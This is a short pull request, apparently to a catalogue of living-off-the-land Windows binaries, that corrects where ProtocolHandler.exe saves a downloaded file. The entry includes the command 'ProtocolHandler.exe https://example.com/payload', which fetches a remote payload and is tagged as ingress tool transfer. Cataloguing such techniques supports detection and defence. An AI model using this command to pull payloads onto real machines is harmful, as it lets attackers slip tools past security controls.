### PR TITLE
Update ProtocolHandler.yml

### DIFF
--- a/yml/OtherMSBinaries/ProtocolHandler.yml
+++ b/yml/OtherMSBinaries/ProtocolHandler.yml
@@ -6,7 +6,7 @@ Created: 2022-07-24
 Commands:
   - Command: ProtocolHandler.exe https://example.com/payload
     Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Usecase: It will download a remote payload and place it in the Downloads folder
     Category: Download
     Privileges: User
     MitreID: T1105

--- a/yml/OtherMSBinaries/ProtocolHandler.yml
+++ b/yml/OtherMSBinaries/ProtocolHandler.yml
@@ -6,7 +6,7 @@ Created: 2022-07-24
 Commands:
   - Command: ProtocolHandler.exe https://example.com/payload
     Description: Downloads payload from remote server
-    Usecase: It will download a remote payload and place it in the Downloads folder
+    Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
     Category: Download
     Privileges: User
     MitreID: T1105


### PR DESCRIPTION
When I added the details of this downloader, I probably got confused with another one I worked on that downloads a payload to the cache folder. This downloader (ProtocolHandler.exe) downloads the file to the standard Windows Downloads folder